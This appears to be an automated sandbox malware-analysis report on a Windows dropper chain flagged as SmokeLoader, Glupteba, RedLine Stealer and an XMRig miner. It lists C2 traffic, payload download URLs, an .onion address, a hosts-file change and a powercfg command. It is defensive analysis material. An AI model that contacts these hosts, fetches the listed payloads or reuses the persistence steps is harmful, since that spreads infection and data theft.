Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ebswgoa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hodjcq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 113Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vrhgpp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mqetfsc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rkucq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 352Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vngcolxw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://liedn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ldxhifgucj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pemamjvcpk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qcgvlxft.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ogmthh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nlijd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nugxs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fotbgladl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: host-host-file8.com

Source: Joe Sandbox View	ASN Name: OnlineSASFR OnlineSASFR
Source: Joe Sandbox View	ASN Name: CMCSUS CMCSUS

Source: Joe Sandbox View	IP Address: 51.15.58.224 51.15.58.224
Source: Joe Sandbox View	IP Address: 95.214.26.28 95.214.26.28
Source: Joe Sandbox View	IP Address: 95.214.26.28 95.214.26.28

Source: global traffic

TCP traffic: 192.168.2.6:49718 -> 51.15.58.224:14433

Source: InstallSetup5.exe, 00000002.00000002.4569490884.0000000000628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.254.7/scripts/plus.php?ip=
Source: InstallSetup5.exe, 00000002.00000002.4569490884.0000000000628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/?format=qqq/SILENTget1023
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: http://archive.org/details/archive.org_bot)Mozilla/5.0
Source: file.exe, 00000000.00000002.2167858508.0000000006C8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: file.exe, 00000000.00000002.2167858508.0000000006C8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: file.exe, 00000000.00000002.2167858508.0000000006C8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: file.exe, 00000000.00000002.2167858508.0000000006C8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4575660571.0000000002B6B000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.g
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: file.exe, 00000000.00000002.2167858508.0000000006C8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: file.exe, 00000000.00000002.2167858508.0000000006C8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: file.exe, 00000000.00000002.2167858508.0000000006C8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: file.exe, 00000000.00000002.2167858508.0000000006C8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe, 00000000.00000002.2167858508.0000000006C8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
Source: Broom.exe, 00000004.00000000.2108968497.00000000008CD000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://fontawesome.io
Source: Broom.exe, 00000004.00000000.2108968497.00000000008CD000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://fontawesome.io/license/
Source: Broom.exe, 00000004.00000000.2108968497.00000000008CD000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://fontawesome.iohttp://fontawesome.iohttp://fontawesome.io/license/http://fontawesome.io/licens
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: http://grub.org)Mozilla/5.0
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: http://help.yahoo.com/help/us/ysearch/slurp)SonyEricssonK550i/R1JD
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://https://_bad_pdb_file.pdb
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: http://invalidlog.txtlookup
Source: InstallSetup5.exe, 00000002.00000002.4569490884.0000000000628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jesuscolin.top/syncUpd.exehttps://iplogger.com/1aiQK4SOFTWARE
Source: InstallSetup5.exe, 00000002.00000002.4569490884.0000000000628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lazzarotata.icu/syncUpd.exedownload_quiet
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: http://localhost:3433/https://duniadekho.baridna:
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: http://misc.yahoo.com.cn/help.html)QueryPerformanceFrequency
Source: InstallSetup5.exe, 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmp, InstallSetup5.exe, 00000002.00000000.2101641255.000000000040A000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: file.exe, 00000000.00000002.2167858508.0000000006C8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000002.2167858508.0000000006C8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe, 00000000.00000002.2167858508.0000000006C8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: file.exe, 00000000.00000002.2167858508.0000000006C8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: http://search.msn.com/msnbot.htm)msnbot/1.1
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: http://search.msn.com/msnbot.htm)net/http:
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: http://search.msn.com/msnbot.htm)pkcs7:
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0BA000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttp://vcr4vuv4sf5233btfy7xboez
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls:
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: http://www.alexa.com/help/webmasters;
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: http://www.alltheweb.com/help/webmaster/crawler)Mozilla/5.0
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: http://www.archive.org/details/archive.org_bot)Opera/9.80
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: http://www.avantbrowser.com)MOT-V9mm/
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000400000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.avantbrowser.com)MOT-V9mm/00.62
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: http://www.bloglines.com)Frame
Source: Broom.exe, 00000004.00000000.2106864524.0000000000401000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: http://www.broomcleaner.com/buyOpen
Source: file.exe, 00000000.00000002.2167858508.0000000006C8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: http://www.everyfeed.com)explicit
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: http://www.exabot.com/go/robot)Opera/9.80
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: http://www.google.c
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: http://www.google.com/bot.html)Mozilla/5.0
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: http://www.google.com/bot.html)crypto/ecdh:
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: http://www.google.com/feedfetcher.html)HKLM
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: http://www.googlebot.com/bot.html)Links
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: http://www.spidersoft.com)
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: http://yandex.com/bots)Opera
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: http://yandex.com/bots)Opera/9.51
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0BA000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C09C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://allstatsin.ru
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C11A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://allstatsin.ruhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0F2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://allstatsin.ruhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionS-1-5-21-2
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0BA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://allstatsin.ruhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttps://al
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C09C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://allstatsin.ruhttps://allstatsin.ruRegQueryValueExWhttps://allstatsin.ruUUIDUUIDPGDSE64-bitNe
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: https://blockchain.infoindex
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: https://blockstream.info/apiinva
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: https://cdn.discordapp.com/attachments/1088058556286251082/1111230812579450950/TsgVtmYNoFT.zipMozill
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: https://github.com/Snawoot/opera-proxy/releases/download/v1.2.2/opera-proxy.windows-386.exeBlackBerr
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsonsize
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)cannot

Source: unknown

DNS traffic detected: queries for: host-file-host6.com

Source: global traffic

HTTP traffic detected: GET /raw/cZ2J3Upi HTTP/1.1Accept: */*Connection: closeHost: pastebin.comUser-Agent: cpp-httplib/0.9

Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 10 Nov 2023 14:37:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 31 0d 0a 5d 00 00 00 7b fa f2 1f b5 69 2b 38 4f e0 1a 9e dd a8 80 43 13 9c d0 5a 0f 7f 06 e0 b5 d6 fd e5 10 a9 1d d2 76 bf 53 5e da 04 ff e8 3d ef 26 5c 1f f2 fc d8 5a a3 06 9b 5d ca f9 6b dd 66 ab ec d1 5a 34 f9 e7 15 7a a0 fe ed 3d a3 87 ec 06 fc 31 c8 91 69 13 41 6b 5f 0f c5 f3 77 fd b7 4e cd a8 0d 0a 30 0d 0a 0d 0a Data Ascii: 61]{i+8OCZvS^=&\Z]kfZ4z=1iAk_wN0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: OS X; U; en) Presto/2.6.30 Version/10.61facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)tls: internal error: handshake returned an error but is marked successfultls: received unexpected handshake message of type %T when waiting for %T equals www.facebook.com (Facebook)
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: o Debian/1.6-7Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)2695994666715063979466701508701962594045780771442439172168272236806126959946667150639794667015087019630673557916 equals www.facebook.com (Facebook)

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ocyugmcp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: host-host-file8.com

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 57.2.cdttvvc.a515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.toolspub2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.toolspub2.exe.8315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 59.2.cdttvvc.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000003B.00000002.2612282713.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2281261302.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2281176476.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003B.00000002.2612331641.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe

Code function: 2_2_0040571B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

2_2_0040571B

E-Banking Fraud

Yara detected Glupteba

Source: Yara match	File source: 5.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.2f70e67.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.2f10e67.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.e0cbefcb1af40c7d4aff4aca26621a98.exe.3800000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.e0cbefcb1af40c7d4aff4aca26621a98.exe.3860000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2270531809.0000000003C42000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4560534739.0000000000843000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4575750686.0000000003353000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: e0cbefcb1af40c7d4aff4aca26621a98.exe PID: 3392, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Modifies the hosts file

Source: C:\Users\user\AppData\Local\Temp\latestX.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Program Files\Google\Chrome\updater.exe	Process information set: 01 00 00 00
Source: C:\Program Files\Google\Chrome\updater.exe	Process information set: 01 00 00 00

System Summary

Malicious sample detected (through community Yara rule)

Source: file.exe, type: SAMPLE	Matched rule: Detects downloader / injector Author: ditekSHen
Source: 39.2.updater.exe.7ff7fa9d7e20.1.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 39.2.updater.exe.7ff7fa9d7e20.1.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 39.2.updater.exe.7ff7fa9d7e20.1.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 39.2.updater.exe.7ff7fa990000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 39.2.updater.exe.7ff7fa990000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 39.2.updater.exe.7ff7fa990000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 39.2.updater.exe.7ff7fa9d4540.2.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 39.2.updater.exe.7ff7fa9d4540.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 39.2.updater.exe.7ff7fa9d4540.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 39.2.updater.exe.7ff7fa9d7e20.1.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 39.2.updater.exe.7ff7fa9d7e20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 39.2.updater.exe.7ff7fa9d7e20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 0000003B.00000002.2612282713.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000011.00000002.4575750686.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000005.00000002.4576083277.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000011.00000002.4575377290.0000000002B16000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000009.00000002.2281261302.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000003.00000002.2155575698.0000000000952000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000027.00000002.2684843852.00007FF7FA9B0000.00000004.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000039.00000002.2540236474.0000000000A82000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000009.00000002.2281176476.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000003B.00000002.2612331641.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.4575660571.0000000002B6B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: C:\Windows\Temp\whxcdqscjswq.tmp, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Windows\Temp\whxcdqscjswq.tmp, type: DROPPED	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\Windows\Temp\whxcdqscjswq.tmp, type: DROPPED	Matched rule: Detects coinmining malware Author: ditekSHen

Uses powercfg.exe to modify the power settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0

Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe	Code function: 2_2_00406DC6	2_2_00406DC6
Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe	Code function: 2_2_0040759D	2_2_0040759D
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_004174DA	3_2_004174DA
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_004111D5	3_2_004111D5
